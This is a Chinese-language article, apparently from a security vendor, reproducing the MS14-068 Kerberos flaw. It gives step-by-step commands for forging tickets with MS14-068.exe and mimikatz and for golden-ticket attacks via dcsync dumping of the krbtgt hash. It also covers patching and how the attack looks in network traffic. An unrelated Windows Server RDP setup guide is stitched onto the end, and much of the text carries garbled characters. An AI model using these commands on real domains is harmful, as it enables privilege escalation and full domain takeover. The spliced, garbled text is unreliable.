MS14-068漏洞可謂是威力無窮���,在域滲透中,第一步就是應(yīng)該檢測域控是否有這個漏洞�����,一旦域控沒有打上這個補(bǔ)丁����,將會使內(nèi)網(wǎng)滲透變得十分簡單。對于內(nèi)網(wǎng)安全問題,聚銘網(wǎng)絡(luò)也一直進(jìn)行跟蹤守護(hù)���,切實協(xié)助企業(yè)組織做好網(wǎng)絡(luò)安全防護(hù)建設(shè)工作,規(guī)避安全風(fēng)險。
一、漏洞描述
遠(yuǎn)程權(quán)限提升漏洞存在于Microsoft Windows的Kerberos KDC實現(xiàn)中��。存在該漏洞的癥狀是����,Microsoft Kerberos KDC實現(xiàn)無法正確驗證簽名,這可能造成Kerberos服務(wù)票證的某些方面被人偽造。簡單來說就是一個域內(nèi)的普通賬戶可以利用此漏洞進(jìn)行權(quán)限提升,升級為域管理員權(quán)限。
二����、受影響版本
Microsoft Windows Windows Server 2012 GoldR2
Microsoft Windows Windows Server 2012 Gold
Microsoft Windows Windows 7 SP1
Microsoft Windows Vista SP2
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2008 SP2
Microsoft Windows Server 2003 SP2
Microsoft Windows 8.1
Microsoft Windows 8
三�����、漏洞利用前提
域控沒有打MS14-068補(bǔ)丁�����,攻擊者拿下了一臺域內(nèi)的普通計算機(jī)并獲得普通域用戶以及密碼/hash值以及用戶suid����。
四���、漏洞復(fù)現(xiàn)
1.搭建環(huán)境
域控制器:windows 2008 r2域內(nèi)主機(jī):windows 7MS14-068.exemimikatz工具
2.漏洞利用
1)查看域控是否有MS14-068這個漏洞����,利用命令systeminfo,查看是否打補(bǔ)?��。↘B3011780),下圖中沒有看到打MS14-068相關(guān)漏洞的補(bǔ)丁。
2)登陸域內(nèi)主機(jī)利用whoami/all查看自己的用戶名以及sid
3)利用MS14-068.exe生成一個新的票據(jù):MS14-068.exe -u user@domain -s sid -d域控ip -p密碼(出現(xiàn)報錯的話一般是密碼錯誤)
4)查看dir \域控計算機(jī)名稱\c$
5)利用mimikatz先清除票據(jù)��,再導(dǎo)入剛剛制作新的票據(jù)
(1) Kerberos::purge #清除票據(jù)
(2) Kerberos::list #列出票據(jù)
(3) Kerberos::ptc 票據(jù)位置 #導(dǎo)入票據(jù)
6)復(fù)現(xiàn)成功����。再次利用dir \域控計算機(jī)名稱\c$,發(fā)現(xiàn)提升到管理員權(quán)限��,表明復(fù)現(xiàn)成功����。
7)黃金票據(jù)偽造
a.查看用戶krbtgt的hash:
lsadump:dcsync /domain:域名 /all /csv
查看用戶的sid:
lsadump:dcsync /domain:域名 /user:krbtgt
b.制造票據(jù)
Kerberos::golden /admin:system /domain:域名 /sid :.... /krbtgt:...(hash) /ticket:票據(jù)名稱
c.導(dǎo)入票據(jù)
Kerberos::purge
Kerberos::ptt 票據(jù)名稱
d.復(fù)現(xiàn)成功
利用dir \域控名稱\c$,出現(xiàn)目錄,表示成功���。
五��、修復(fù)方案
1. 升級補(bǔ)丁
與此同時�����,請及時做好自查和預(yù)防工作����,以免遭受黑客攻擊�����。
六�、復(fù)現(xiàn)過程中的異常流量分析
1.正常流量
2.異常流量分析
Client在發(fā)起認(rèn)證請求時�����,通過設(shè)置include-PAC為False�,則返回TGT中不會包含PAC�。
- 總結(jié):正常和異常流量的區(qū)別在于pac的配置上的異常
異常流量在1.AS-REQ階段終端設(shè)置了pac為false
正常流量在1.AS-REQ階段終端設(shè)置了pac為true
異常流量在3.TGS-REQ階段終端又多了一個pac的設(shè)置,且值為false
正常流量在3.TGS-REQ階段終端沒有關(guān)于pac 的設(shè)置
#挑戰(zhàn)30天在頭條寫日記#
在Windows Server上啟用和配置遠(yuǎn)程桌面服務(wù)(RDP)是允許管理員通過遠(yuǎn)程連接管理服務(wù)器的重要步驟�����。
操作步驟:
注意:在配置遠(yuǎn)程桌面服務(wù)之前���,請確保已經(jīng)登錄到具有管理員權(quán)限的Windows Server帳戶����。
步驟 1:打開服務(wù)器管理器。
- 在Windows任務(wù)欄的搜索框中鍵入"Server Manager"�,然后單擊打開�。
步驟 2:選擇“遠(yuǎn)程桌面服務(wù)”角色�。
- 在服務(wù)器管理器中,單擊左側(cè)導(dǎo)航欄中的“管理”����。
- 在右側(cè)窗格中,單擊“添加角色和功能”。
步驟 3:角色選擇���。
- 單擊“下一步”以開始角色安裝向?qū)А?/span>
- 在“選擇角色服務(wù)”頁面上,選擇“遠(yuǎn)程桌面服務(wù)”�。
步驟 4:選擇安裝服務(wù)��。
- 在“選擇角色服務(wù)”頁面上,選擇以下服務(wù):遠(yuǎn)程桌面會話主機(jī)(Remote Desktop Session Host):如果您計劃允許多個遠(yuǎn)程用戶同時訪問服務(wù)器�。遠(yuǎn)程桌面許可證服務(wù)器(Remote Desktop Licensing):如果需要配置許可證服務(wù)器���。遠(yuǎn)程桌面網(wǎng)關(guān)(Remote Desktop Gateway):如果需要通過互聯(lián)網(wǎng)連接服務(wù)器����。
步驟 5:確認(rèn)安裝�。
- 單擊“下一步”以查看安裝選項。
- 單擊“安裝”以開始安裝所選的遠(yuǎn)程桌面服務(wù)。
步驟 6:配置遠(yuǎn)程桌面服務(wù)�����。
- 在安裝完成后����,單擊“遠(yuǎn)程桌面服務(wù)”角色以展開它。
- 單擊“收集和配置遠(yuǎn)程桌面部署”。
步驟 7:配置遠(yuǎn)程桌面主機(jī)設(shè)置。
- 在“部署類型”頁面上,選擇“遠(yuǎn)程桌面會話主機(jī)”���。
- 單擊“下一步”。
步驟 8:配置 RDP 訪問。
- 在“遠(yuǎn)程桌面許可證服務(wù)器”頁面上���,選擇許可證服務(wù)器類型。
- 配置RDP訪問和許可證服務(wù)器設(shè)置。
步驟 9:確認(rèn)設(shè)置。
- 單擊“部署”以開始配置遠(yuǎn)程桌面服務(wù)�。
- 在配置過程中�����,根據(jù)需要完成其他設(shè)置,如證書、用戶權(quán)限等。
步驟 10:測試 RDP 連接��。
- 使用RDP客戶端從遠(yuǎn)程計算機(jī)連接到您的Windows Server����。輸入服務(wù)器的IP地址或主機(jī)名以建立連接。
- 輸入具有遠(yuǎn)程訪問權(quán)限的管理員憑據(jù)。
- 成功連接后�,您可通過RDP進(jìn)行遠(yuǎn)程管理服務(wù)器��。
完成這些步驟后,您的Windows Server應(yīng)該已配置為允許遠(yuǎn)程桌面連接。
